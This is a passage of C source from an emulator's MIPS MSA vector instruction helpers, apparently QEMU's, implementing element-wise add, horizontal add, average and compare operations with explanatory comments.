*pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_adds_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_adds_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_addv_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 + arg2; } void helper_msa_addv_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_addv_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_addv_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_addv_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_addv_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_addv_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_addv_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_addv_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_addv_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_addv_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_addv_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = 
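/*
 * ADDV is plain modular addition: msa_addv_df() returns the full
 * int64_t sum, and the narrowing store into the destination element
 * discards the high bits, which is exactly the wrap-around the
 * instruction specifies.
 */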
msa_addv_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_addv_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_addv_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_addv_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_addv_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_addv_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_addv_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_addv_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_addv_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_addv_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_addv_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_addv_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_addv_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_addv_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_addv_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_addv_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_addv_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_addv_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_addv_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_addv_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_addv_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_addv_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_addv_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } #define SIGNED_EVEN(a, df) \ ((((int64_t)(a)) << (64 - DF_BITS(df) / 2)) >> (64 - DF_BITS(df) / 2)) #define UNSIGNED_EVEN(a, df) \ ((((uint64_t)(a)) << (64 - DF_BITS(df) / 2)) >> (64 - DF_BITS(df) / 2)) #define SIGNED_ODD(a, df) \ ((((int64_t)(a)) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df) / 2)) #define UNSIGNED_ODD(a, df) \ ((((uint64_t)(a)) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df) / 2)) static inline int64_t msa_hadd_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return SIGNED_ODD(arg1, df) + SIGNED_EVEN(arg2, df); } void helper_msa_hadd_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_hadd_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_hadd_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_hadd_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_hadd_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_hadd_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_hadd_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_hadd_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_hadd_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_hadd_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_hadd_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_hadd_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_hadd_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_hadd_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_hadd_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = 
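/*
 * The horizontal adds pair up the two halves of each element: for
 * DF_HALF, SIGNED_ODD() extracts bits [15:8] of a 16-bit element and
 * SIGNED_EVEN() extracts bits [7:0], both sign-extended to int64_t, so
 * msa_hadd_s_df() adds the odd half of a ws element to the even half of
 * the corresponding wt element and stores the full-width sum.
 */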
&(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_hadd_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_hadd_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_hadd_u_df(uint32_t df, int64_t arg1, int64_t arg2) { return UNSIGNED_ODD(arg1, df) + UNSIGNED_EVEN(arg2, df); } void helper_msa_hadd_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_hadd_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_hadd_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_hadd_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_hadd_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_hadd_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_hadd_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_hadd_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_hadd_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_hadd_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_hadd_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_hadd_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_hadd_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_hadd_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_hadd_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_hadd_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_hadd_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Average * ----------- * * +---------------+----------------------------------------------------------+ * | AVE_S.B | Vector Signed Average (byte) | * | AVE_S.H | Vector Signed Average (halfword) | * | AVE_S.W | Vector Signed Average (word) | * | AVE_S.D | Vector Signed Average (doubleword) | * | AVE_U.B | Vector Unsigned Average (byte) | * | AVE_U.H | Vector Unsigned Average (halfword) | * | AVE_U.W | Vector Unsigned Average (word) | * | AVE_U.D | Vector Unsigned Average (doubleword) | * | AVER_S.B | Vector Signed Average Rounded (byte) | * | AVER_S.H | Vector Signed Average Rounded (halfword) | * | AVER_S.W | Vector Signed Average Rounded (word) | * | AVER_S.D | Vector Signed Average Rounded (doubleword) | * | AVER_U.B | Vector Unsigned Average Rounded (byte) | * | AVER_U.H | Vector Unsigned Average Rounded (halfword) | * | AVER_U.W | Vector Unsigned Average Rounded (word) | * | AVER_U.D | Vector Unsigned Average Rounded (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_ave_s_df(uint32_t df, int64_t arg1, int64_t arg2) { /* signed shift */ return (arg1 >> 1) + (arg2 >> 1) + (arg1 & arg2 & 1); } void helper_msa_ave_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_ave_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_ave_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_ave_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_ave_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_ave_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = 
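/*
 * msa_ave_s_df() computes floor((a + b) / 2) without overflowing the
 * intermediate sum: (a >> 1) + (b >> 1) keeps both addends in range,
 * and (a & b & 1) restores the carry lost when both low bits are set.
 * Worked example: ave_s(5, 7) = 2 + 3 + 1 = 6.
 */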
msa_ave_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_ave_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_ave_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_ave_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_ave_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_ave_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_ave_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_ave_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_ave_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_ave_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_ave_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_ave_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_ave_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_ave_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_ave_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_ave_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_ave_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_ave_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_ave_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_ave_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_ave_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_ave_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_ave_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_ave_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_ave_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_ave_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_ave_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_ave_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline uint64_t msa_ave_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); /* unsigned shift */ return (u_arg1 >> 1) + (u_arg2 >> 1) + (u_arg1 & u_arg2 & 1); } void helper_msa_ave_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_ave_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_ave_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_ave_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_ave_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_ave_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_ave_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_ave_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_ave_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_ave_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_ave_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_ave_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_ave_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_ave_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_ave_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_ave_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_ave_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_ave_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { 
wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_ave_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_ave_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_ave_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_ave_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_ave_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_ave_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_ave_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_ave_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_ave_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_ave_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_ave_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_ave_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_ave_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_ave_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_ave_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_ave_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_aver_s_df(uint32_t df, int64_t arg1, int64_t arg2) { /* signed shift */ return (arg1 >> 1) + (arg2 >> 1) + ((arg1 | arg2) & 1); } void helper_msa_aver_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_aver_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_aver_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_aver_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_aver_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_aver_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_aver_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_aver_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_aver_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_aver_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_aver_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_aver_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_aver_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_aver_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_aver_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_aver_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_aver_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_aver_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_aver_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_aver_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_aver_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_aver_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_aver_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_aver_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_aver_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_aver_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_aver_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = 
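/*
 * The AVER variants round up instead of truncating: ((arg1 | arg2) & 1)
 * adds the carry whenever either low bit is set, so
 * aver_s(a, b) == floor((a + b + 1) / 2).  Worked example:
 * aver_s(5, 6) = 2 + 3 + 1 = 6, whereas ave_s(5, 6) = 5.
 */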
&(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_aver_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_aver_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_aver_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_aver_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_aver_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_aver_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_aver_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline uint64_t msa_aver_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); /* unsigned shift */ return (u_arg1 >> 1) + (u_arg2 >> 1) + ((u_arg1 | u_arg2) & 1); } void helper_msa_aver_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_aver_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_aver_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_aver_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_aver_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_aver_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_aver_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_aver_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_aver_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_aver_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_aver_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_aver_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_aver_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_aver_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_aver_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_aver_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_aver_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_aver_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_aver_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_aver_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_aver_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_aver_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_aver_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_aver_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_aver_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_aver_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_aver_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_aver_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_aver_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_aver_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_aver_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_aver_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_aver_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_aver_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Compare * ----------- * * 
+---------------+----------------------------------------------------------+ * | CEQ.B | Vector Compare Equal (byte) | * | CEQ.H | Vector Compare Equal (halfword) | * | CEQ.W | Vector Compare Equal (word) | * | CEQ.D | Vector Compare Equal (doubleword) | * | CLE_S.B | Vector Compare Signed Less Than or Equal (byte) | * | CLE_S.H | Vector Compare Signed Less Than or Equal (halfword) | * | CLE_S.W | Vector Compare Signed Less Than or Equal (word) | * | CLE_S.D | Vector Compare Signed Less Than or Equal (doubleword) | * | CLE_U.B | Vector Compare Unsigned Less Than or Equal (byte) | * | CLE_U.H | Vector Compare Unsigned Less Than or Equal (halfword) | * | CLE_U.W | Vector Compare Unsigned Less Than or Equal (word) | * | CLE_U.D | Vector Compare Unsigned Less Than or Equal (doubleword) | * | CLT_S.B | Vector Compare Signed Less Than (byte) | * | CLT_S.H | Vector Compare Signed Less Than (halfword) | * | CLT_S.W | Vector Compare Signed Less Than (word) | * | CLT_S.D | Vector Compare Signed Less Than (doubleword) | * | CLT_U.B | Vector Compare Unsigned Less Than (byte) | * | CLT_U.H | Vector Compare Unsigned Less Than (halfword) | * | CLT_U.W | Vector Compare Unsigned Less Than (word) | * | CLT_U.D | Vector Compare Unsigned Less Than (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_ceq_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 == arg2 ? -1 : 0; } static inline int8_t msa_ceq_b(int8_t arg1, int8_t arg2) { return arg1 == arg2 ? -1 : 0; } void helper_msa_ceq_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_ceq_b(pws->b[0], pwt->b[0]); pwd->b[1] = msa_ceq_b(pws->b[1], pwt->b[1]); pwd->b[2] = msa_ceq_b(pws->b[2], pwt->b[2]); pwd->b[3] = msa_ceq_b(pws->b[3], pwt->b[3]); pwd->b[4] = msa_ceq_b(pws->b[4], pwt->b[4]); pwd->b[5] = msa_ceq_b(pws->b[5], pwt->b[5]); pwd->b[6] = msa_ceq_b(pws->b[6], pwt->b[6]); pwd->b[7] = msa_ceq_b(pws->b[7], pwt->b[7]); pwd->b[8] = msa_ceq_b(pws->b[8], pwt->b[8]); pwd->b[9] = msa_ceq_b(pws->b[9], pwt->b[9]); pwd->b[10] = msa_ceq_b(pws->b[10], pwt->b[10]); pwd->b[11] = msa_ceq_b(pws->b[11], pwt->b[11]); pwd->b[12] = msa_ceq_b(pws->b[12], pwt->b[12]); pwd->b[13] = msa_ceq_b(pws->b[13], pwt->b[13]); pwd->b[14] = msa_ceq_b(pws->b[14], pwt->b[14]); pwd->b[15] = msa_ceq_b(pws->b[15], pwt->b[15]); } static inline int16_t msa_ceq_h(int16_t arg1, int16_t arg2) { return arg1 == arg2 ? -1 : 0; } void helper_msa_ceq_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_ceq_h(pws->h[0], pwt->h[0]); pwd->h[1] = msa_ceq_h(pws->h[1], pwt->h[1]); pwd->h[2] = msa_ceq_h(pws->h[2], pwt->h[2]); 